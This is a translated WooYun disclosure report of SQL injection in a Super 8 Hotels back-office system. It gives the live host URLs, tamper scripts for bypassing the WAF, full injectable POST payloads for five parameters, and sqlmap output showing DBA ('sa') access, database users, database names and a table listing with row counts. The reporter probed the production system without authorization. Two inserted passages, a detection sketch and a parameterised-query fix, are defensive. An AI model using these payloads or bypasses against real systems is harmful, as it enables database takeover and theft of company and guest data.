
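Vulnerability summary

Bug ID: wooyun-2015-0138076

Title: SQL injection in a Super 8 Hotels (速8酒店) back-office management system, WAF can be bypassed (DBA privileges + hundreds of thousands of records leaked)

Vendor: Super 8 Hotels (速8酒店)

Author: 路人甲

Submitted: 2015-08-31 11:15

Fixed: 2015-10-15 12:12

Disclosed: 2015-10-15 12:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]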


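Vulnerability details

Disclosure status:

2015-08-31: Details reported to the vendor; awaiting vendor response
2015-08-31: Vendor confirmed; details visible to the vendor only
2015-09-10: Details disclosed to core white hats and domain experts
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to trainee white hats
2015-10-15: Details disclosed to the public

Brief description:

It hasn't been fixed, so the back office is open for some testing!~~~

Detailed description:

WooYun: Weak password in a Super 8 Hotels (速8酒店) back-office management system (all hotel addresses, contacts, suppliers and other information can be modified)
The reporter of that bug has already shown that all hotel addresses, contacts, suppliers and other information can be modified, so I won't repeat that; instead I went looking for injection points in the back office!
Tested with --tamper between.py,randomcase.py,space2comment.py --dbms "Microsoft SQL Server" added.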
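
The three tamper scripts named above change how a payload is written (comments in place of spaces, mixed keyword case, comparisons rewritten as BETWEEN) without changing what it means, which is why a filter matching raw text can miss it. The following is an added example, not part of the original report: a detection sketch that normalises a form-field value before matching. The function names, signature names and sample values are constructed for illustration, and values are assumed to be already URL-decoded.

```python
import re

# Constructed form-field values, assumed already URL-decoded (not real logs).
PLAIN = "1%' AND 2881=2881 AND '%'='"
OBFUSCATED = "1%'/**/aNd/**/2881/**/bEtWeEn/**/2881/**/AnD/**/2881/**/aNd/**/'%'='"
ERROR_PROBE = "1%'/**/anD/**/8752=cOnVeRt(InT,(sElEcT/**/cHaR(113)+ChAr(121)))/**/AnD/**/'%'='"
BENIGN = "Rooms between 100 and 100% cotton sheets"

# A naive filter: exact keyword case and literal single spaces on the raw value.
NAIVE = re.compile(r" AND \d+=\d+|CONVERT\(INT,\(SELECT ")

# Signatures are written once, against the normalised form only.
SIGNATURES = [
    ("tautology", re.compile(r"\b(?:AND|OR) (\d+) ?= ?\1\b")),
    ("convert-int-select", re.compile(r"CONVERT ?\( ?INT ?, ?\( ?SELECT\b")),
    ("quote-rebalance", re.compile(r"' ?(?:AND|OR) .*'%' ?= ?'")),
]


def normalize(value):
    """Reduce a field value to a canonical form before signature matching."""
    # Inline comments used in place of whitespace (space2comment.py).
    text = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # Collapse whitespace runs and fold case (randomcase.py).
    text = re.sub(r"\s+", " ", text).upper()
    # Comparison operators rewritten as BETWEEN forms (between.py):
    # "A NOT BETWEEN 0 AND B" stands for "A > B",
    # "A BETWEEN B AND B" stands for "A = B".
    text = re.sub(r"\bNOT BETWEEN 0 AND (\S+)", r"> \1", text)
    text = re.sub(r"\bBETWEEN (\S+) AND \1(?!\S)", r"= \1", text)
    return text.strip()


def naive_hit(value):
    """True if the raw-text filter fires on the value as received."""
    return NAIVE.search(value) is not None


def detect(value):
    """Names of the signatures that fire on the normalised value."""
    text = normalize(value)
    return [name for name, rx in SIGNATURES if rx.search(text)]


if __name__ == "__main__":
    for label, sample in [("plain", PLAIN), ("obfuscated", OBFUSCATED),
                          ("error probe", ERROR_PROBE), ("benign", BENIGN)]:
        print(f"{label:12} naive={naive_hit(sample)!s:5} normalised={detect(sample)}")
```

Normalisation narrows the gap between what the filter sees and what the database parses; it does not replace fixing the query itself.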
1. First location: search in news category management

http://mys8.super8.com.cn:81/pages/bs/newstype/bs_newstypemanage.aspx (POST)
ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$UpdatePanel1|
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbI
sRecursionEX=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00
$ContentPlaceHolder1$ContentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
State=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$txtRemark=&__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUME
NT=&__VIEWSTATE=[value omitted]&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_ExpandState=ennen&ContentPlaceHolder1_ContentPlaceHo
lder2_tvBS_NewsType_SelectedNode=ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Con
tentPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermarked is injectable.

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearc
h$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentP
laceHolder2$UpdatePanel1|ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btn
Query&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbIsRecursionEX=on&ctl
00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermark
ed=1%' AND 2881=2881 AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$wtxtAdvancedSearch$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$Content
PlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00$ContentPlaceHolder1$Con
tentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHo
lder2$txtState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtRemark=&__EVENTTARGET=ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=[value omitted]
&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_Expan
dState=ennen&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_SelectedNode=
ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Cont
entPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&
---
[09:22:41] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[09:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:22:41] [INFO] fetching current user
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 2
[09:22:41] [INFO] resumed: sa
current user: 'sa'
[09:22:41] [INFO] fetching current database
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 8
[09:22:41] [INFO] resumed: super8db
current database: 'super8db'
[09:22:41] [INFO] testing if current user is DBA
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[09:22:43] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
database management system users [4]:
[*] ##MS_PolicyEventPr
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] n
database management system users password hashes:
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: super8db
+--------------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------------+---------+
| dbo.BN_StoreItemValueHis | 168405 |
| dbo.BN_StoreItemValue | 34335 |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContent | 14950 |
| dbo.DataOperateLogDetail | 12240 |
| dbo.BN_EvaluateActivityFranchiseStoreProject | 6578 |
| dbo.BN_PunishmentActivityFranchiseStoreProjectRule | 3564 |
| dbo.BehaviorLog | 2875 |
| dbo.BN_PunishmentActivityFranchiseStoreProject | 2376 |
| dbo.Log_StaffLoginHis | 2110 |
| dbo.BN_PunishmentActivityFranchiseStore | 1960 |
| dbo.BN_EvaluateActivityFranchiseStore | 1884 |
| dbo.DataOperateLog | 1554 |
| dbo.BS_Area | 1300 |
| dbo.BS_FranchiseStore | 776 |
| dbo.BS_FranchiseStore2 | 508 |
| dbo.BN_BusinessFile | 337 |
| dbo.BN_File | 337 |
| dbo.BN_Su8CoinChangeDetail | 295 |
| dbo.BN_ConvertApply | 287 |
| dbo.RolePermission | 281 |
| dbo.BS_GoodsType | 206 |
| dbo.BS_EvaluateProjectContent | 151 |
| dbo.Link | 132 |
| dbo.bak_Link_20141201 | 127 |
| dbo.BS_Goods | 125 |
| dbo.bak_Link_20140827 | 124 |
| dbo.bak_Link_0626 | 123 |
| dbo.bak_Link_0731 | 122 |
| dbo.bak_Link | 120 |
| dbo.bak_Link_20140613 | 120 |
| dbo.BS_EvaluateProject | 98 |
| dbo.bak_Link_0313 | 90 |
| dbo.Permission | 83 |
| dbo.Module | 81 |
| dbo.bak_Permission_20141201 | 80 |
| dbo.bak_Module_20141201 | 78 |
| dbo.bak_Permission_20140827 | 78 |
| dbo.bak_Permission_0626 | 77 |
| dbo.bak_Permission_0731 | 77 |
| dbo.bak_Module_20140827 | 76 |
| dbo.bak_Permission_20140613 | 76 |
| dbo.bak_Module_0626 | 75 |
| dbo.bak_Module_0731 | 75 |
| dbo.bak_Module_20140613 | 74 |
| dbo.bak_RolePermission | 73 |
| dbo.bak_Permission | 70 |
| dbo.BS_StoreItem | 69 |
| dbo.UserRole | 62 |
| dbo.bak_Permission_0313 | 61 |
| dbo.bak_Module_0313 | 59 |
| dbo.WS_Dynamic | 55 |
| dbo.BS_DataDictionary | 54 |
| dbo.BN_EvaluateActivityProjectContent | 53 |
| dbo.BS_Supplier | 48 |
| dbo.BN_Notice | 42 |
| dbo.BS_SupplierType | 40 |
| dbo.BS_ComplaintType | 37 |
| dbo.BN_DepartmentNotice | 34 |
| dbo.BN_ConvertApply123 | 25 |
| dbo.BN_EvaluateActivityRuleSection | 23 |
| dbo.BN_EvaluateActivityProject | 22 |
| dbo.BN_ConvertProject | 20 |
| dbo.BS_PunishmentProjectRule | 19 |
| dbo.Role | 19 |
| dbo.BN_BusinessFormData | 18 |
| dbo.BN_PunishmentActivityProjectRule | 16 |
| dbo.BS_Department | 15 |
| dbo.PermissionCategory | 15 |
| dbo.bak_PermissionCategory | 14 |
| dbo.bak_PermissionCategory_0313 | 13 |
| dbo.BS_Staff | 13 |
| dbo.BN_Albums | 12 |
| dbo.BS_EvaluateScoringCriteria | 12 |
| dbo.BN_Complaint | 11 |
| dbo.BN_DepartmentInfo | 11 |
| dbo.BN_StoreQuestion | 11 |
| dbo.BN_TimeFlag | 11 |
| dbo.BS_DataDictionaryType | 11 |
| dbo.WS_News | 11 |
| dbo.ForgetPassword | 10 |
| dbo.BN_DepartmentSection | 9 |
| dbo.BN_FormChildItem | 9 |
| dbo.BN_ToDoListHistory | 9 |
| dbo.BS_EvaluateCriteria | 8 |
| dbo.SSO | 8 |
| dbo.BN_ConvertAuditLog | 7 |
| dbo.BN_PunishmentActivityProject | 6 |
| dbo.BN_PunishmentActivityRuleSection | 6 |
| dbo.BS_DynamicType | 6 |
| dbo.PC_ShoppingCartDetail | 6 |
| dbo.BN_ConvertActivityRuleSection | 5 |
| dbo.BS_NewsType | 5 |
| dbo.BS_StoreType | 5 |
| dbo.BN_DepartmentSectionDetail | 4 |
| dbo.BN_AlbumsType | 3 |
| dbo.BN_ConvertActivity | 3 |
| dbo.BN_ConvertActivityRule | 3 |
| dbo.BN_EvaluateActivity | 3 |
| dbo.BN_FormItem | 3 |
| dbo.BN_PunishmentActivity | 3 |
| dbo.BN_PunishmentActivityRule | 3 |
| dbo.BS_PunishmentProject | 3 |
| dbo.PC_PurchasingOrderDetail | 3 |
| dbo.RoleCategory | 3 |
| dbo.WS_MessageHis | 3 |
| dbo.BN_ComplaintCase | 2 |
| dbo.BN_EvaluateActivityFranchiseStoreAppeal | 2 |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContentLog | 2 |
| dbo.BN_EvaluateActivityRule | 2 |
| dbo.BN_FormColumn | 2 |
| dbo.BN_Su8CoinAdjustment | 2 |
| dbo.BN_ToDoList | 2 |
| dbo.BS_FranchiseStoreStaff | 2 |
| dbo.BN_BusinessForm | 1 |
| dbo.BN_Form | 1 |
| dbo.BS_Franchisee | 1 |
| dbo.BS_QuestionnaireMould | 1 |
| dbo.BS_QuestionnaireMouldQuestion | 1 |
| dbo.BS_QuestionnaireMouldQuestionAnswer | 1 |
| dbo.PC_PurchasingOrder | 1 |
| dbo.PC_ShoppingCart | 1 |
| dbo.SubSystem | 1 |
| dbo.WS_Message | 1 |
| dbo.WS_Settings | 1 |
+--------------------------------------------------------+---------+
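
The boolean-based payload shown above (`1%' AND 2881=2881 AND '%'='`) only parses if the search term is pasted between `'%` and `%'` in a LIKE clause. The following is an added example, not code from the report or from the affected application: the concatenated form beside a bound-parameter form. It uses Python's built-in sqlite3 as a stand-in for SQL Server, and the table `news_type`, its rows and the function names are hypothetical.

```python
import sqlite3

TRUE_PROBE = "1%' AND 2881=2881 AND '%'='"   # payload shape from the sqlmap output
FALSE_PROBE = "1%' AND 2881=2882 AND '%'='"  # constructed: same shape, false predicate


def make_db():
    """In-memory database with a hypothetical news-category table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news_type (name TEXT)")
    db.executemany("INSERT INTO news_type VALUES (?)",
                   [("news 1",), ("notice",), ("100% off",)])
    return db


def search_concat(db, term):
    """Vulnerable form: the term becomes part of the SQL text."""
    sql = ("SELECT name FROM news_type WHERE name LIKE '%" + term + "%' "
           "ORDER BY rowid")
    return [row[0] for row in db.execute(sql)]


def escape_like(term, esc="\\"):
    """Make LIKE wildcards in user input literal.

    On SQL Server, '[' is also a LIKE wildcard and needs the same treatment.
    """
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_bound(db, term):
    """Hardened form: the SQL text is constant, the term travels as a value."""
    sql = "SELECT name FROM news_type WHERE name LIKE ? ESCAPE '\\' ORDER BY rowid"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(term) + "%",))]


if __name__ == "__main__":
    db = make_db()
    # Concatenated: the result set follows the injected predicate, which is
    # the true/false signal a boolean-based blind technique relies on.
    print("concat true :", search_concat(db, TRUE_PROBE))
    print("concat false:", search_concat(db, FALSE_PROBE))
    # Bound: both probes are just odd search strings that match nothing.
    print("bound true  :", search_bound(db, TRUE_PROBE))
    print("bound false :", search_bound(db, FALSE_PROBE))
    # Legitimate searches still work, including a literal percent sign.
    print("bound '100%':", search_bound(db, "100%"))
```

The sqlmap output also reports the application's database login as `sa`; connecting with a dedicated low-privilege login limits what any remaining query flaw can reach.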


2. Custom form management (advanced query)

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[value omitted]&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName,
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription,
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName and
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUserName are all injectable.

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[value omitted]
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1%' AND 8752=CONVERT(INT,(SELECT CHA
R(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8752=8752) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113
))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[value omitted]
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2%' AND 1740=CONVERT(INT,(SELECT CHAR(113)+CHAR
(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1740=1740) THEN CHAR(49)
ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113))) AND '%'
='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-
07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2
015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$s
cLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModif
yTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
CreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[value omitted]
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3%' AND 4061=CONVERT(INT,(SELECT
CHAR(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4061=4061)
THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(
113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModi
fyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUser
Name
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=…&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$txtLastModifyUserName=4%' AND 3899=CONVERT(INT,(SELECT CHAR
(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3899=3899) THE
N CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113)
)) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
---
[20:10:18] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtFormName, type: Single quoted string (default)
[1] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName, type: Single quoted string
[2] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtDescription, type: Single quoted string
[3] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtLastModifyUserName, type: Single quoted string
[q] Quit
> 0
[20:10:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
